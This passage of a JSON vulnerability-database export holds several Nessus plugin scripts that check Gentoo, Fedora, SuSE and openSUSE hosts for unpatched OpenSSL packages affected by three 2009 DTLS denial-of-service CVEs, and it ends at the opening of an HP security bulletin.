exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/openssl\", unaffected:make_list(\"ge 0.9.8l-r2\"), vulnerable:make_list(\"lt 0.9.8l-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSL\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:15", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=501254", "http://www.nessus.org/u?567df4b3", "https://bugzilla.redhat.com/show_bug.cgi?id=501253", "https://bugzilla.redhat.com/show_bug.cgi?id=501572"], "pluginID": "39474", "description": "Security update fixing DoS bugs in DTLS code. CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2009-06-21T00:00:00", "title": "Fedora 10 : openssl-0.9.8g-14.fc10 (2009-5412)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2016-12-08T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:openssl"], "id": "FEDORA_2009-5412.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5412.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39474);\n script_version (\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:21:55 $\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\");\n script_bugtraq_id(33150, 35001, 35138);\n script_xref(name:\"FEDORA\", value:\"2009-5412\");\n\n script_name(english:\"Fedora 10 : openssl-0.9.8g-14.fc10 (2009-5412)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update fixing DoS bugs in DTLS code. CVE-2009-1377\nCVE-2009-1378 CVE-2009-1379\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501572\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-June/025352.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?567df4b3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"openssl-0.9.8g-14.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:33:17", "references": ["http://support.novell.com/security/cve/CVE-2009-1377.html", "http://support.novell.com/security/cve/CVE-2009-1378.html", "http://support.novell.com/security/cve/CVE-2009-1379.html"], "pluginID": "41572", "description": "Three remote DoS vulnerabilities have been fixed in OpenSSL: a DTLS epoch record buffer memory DoS (CVE-2009-1377), a DTLS fragment handling memory DoS (CVE-2009-1378) and a DTLS fragment read after a free DoS. (CVE-2009-1379)", "edition": 5, "reporter": "Tenable", "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6267)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2016-12-22T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_OPENSSL-6267.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41572", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41572);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:28 $\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\");\n\n script_name(english:\"SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6267)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three remote DoS vulnerabilities have been fixed in OpenSSL: a DTLS\nepoch record buffer memory DoS (CVE-2009-1377), a DTLS fragment\nhandling memory DoS (CVE-2009-1378) and a DTLS fragment read after a\nfree DoS. (CVE-2009-1379)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1377.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1378.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1379.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6267.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"openssl-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"openssl-devel-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"openssl-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"openssl-devel-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"openssl-doc-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.32\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.32\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:53:41", "references": [], "pluginID": "38923", "description": "Three remote DoS vulnerabilities have been fixed in OpenSSL: a DTLS epoch record buffer memory DoS (CVE-2009-1377), a DTLS fragment handling memory DoS (CVE-2009-1378) and a DTLS fragment read after a free DoS (CVE-2009-1379).", "edition": 5, "reporter": "Tenable", "published": "2009-05-27T00:00:00", "title": "openSUSE 10 Security Update : libopenssl-devel (libopenssl-devel-6268)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2016-12-22T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssl", "cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:libopenssl0_9_8-32bit", "p-cpe:/a:novell:opensuse:libopenssl0_9_8", "p-cpe:/a:novell:opensuse:libopenssl-devel", "p-cpe:/a:novell:opensuse:openssl-certs"], "id": "SUSE_LIBOPENSSL-DEVEL-6268.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=38923", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libopenssl-devel-6268.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38923);\n script_version (\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:27 $\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\");\n\n script_name(english:\"openSUSE 10 Security Update : libopenssl-devel (libopenssl-devel-6268)\");\n script_summary(english:\"Check for the libopenssl-devel-6268 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three remote DoS vulnerabilities have been fixed in OpenSSL: a DTLS\nepoch record buffer memory DoS (CVE-2009-1377), a DTLS fragment\nhandling memory DoS (CVE-2009-1378) and a DTLS fragment read after a\nfree DoS (CVE-2009-1379).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libopenssl-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl0_9_8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl0_9_8-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-certs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"libopenssl-devel-0.9.8e-45.11\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"libopenssl0_9_8-0.9.8e-45.11\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"openssl-0.9.8e-45.11\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"openssl-certs-0.9.8e-45.11\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", cpu:\"x86_64\", reference:\"libopenssl0_9_8-32bit-0.9.8e-45.11\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:07:11", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=501254", "http://www.nessus.org/u?9902f1ed", "https://bugzilla.redhat.com/show_bug.cgi?id=501253", "https://bugzilla.redhat.com/show_bug.cgi?id=501572"], "pluginID": "39476", "description": "Security update fixing DoS bugs in DTLS code. CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2009-06-21T00:00:00", "title": "Fedora 11 : openssl-0.9.8k-5.fc11 (2009-5452)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2016-12-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssl", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-5452.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39476", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5452.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39476);\n script_version (\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:21:55 $\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\");\n script_bugtraq_id(35001, 35138);\n script_xref(name:\"FEDORA\", value:\"2009-5452\");\n\n script_name(english:\"Fedora 11 : openssl-0.9.8k-5.fc11 (2009-5452)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update fixing DoS bugs in DTLS code. CVE-2009-1377\nCVE-2009-1378 CVE-2009-1379\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501572\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-June/025387.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9902f1ed\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"openssl-0.9.8k-5.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:56:02", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=504687"], "pluginID": "40034", "description": "Three remote DoS vulnerabilities have been fixed in OpenSSL: a DTLS epoch record buffer memory DoS (CVE-2009-1377), a DTLS fragment handling memory DoS (CVE-2009-1378) and a DTLS fragment read after a free DoS (CVE-2009-1379).", "edition": 5, "reporter": "Tenable", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : libopenssl-devel (libopenssl-devel-907)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssl", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:libopenssl0_9_8-32bit", "p-cpe:/a:novell:opensuse:libopenssl0_9_8", "p-cpe:/a:novell:opensuse:libopenssl-devel", "p-cpe:/a:novell:opensuse:openssl-certs"], "id": "SUSE_11_0_LIBOPENSSL-DEVEL-090522.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40034", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libopenssl-devel-907.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40034);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:50 $\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\");\n\n script_name(english:\"openSUSE Security Update : libopenssl-devel (libopenssl-devel-907)\");\n script_summary(english:\"Check for the libopenssl-devel-907 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three remote DoS vulnerabilities have been fixed in OpenSSL: a DTLS\nepoch record buffer memory DoS (CVE-2009-1377), a DTLS fragment\nhandling memory DoS (CVE-2009-1378) and a DTLS fragment read after a\nfree DoS (CVE-2009-1379).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=504687\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libopenssl-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl0_9_8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl0_9_8-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-certs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libopenssl-devel-0.9.8g-47.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libopenssl0_9_8-0.9.8g-47.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"openssl-0.9.8g-47.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"openssl-certs-0.9.8g-47.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libopenssl0_9_8-32bit-0.9.8g-47.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:34", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02029444\r\nVersion: 1\r\n\r\nHPSBMA02492 SSRT100079 rev.1 - HP System Management Homepage &#40;SMH&#41; for Linux and Windows, Remote Cross Site Scripting &#40;XSS&#41;, Denial of Service &#40;DoS&#41;, Execution of\r\nArbitrary Code, Unauthorized Access\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 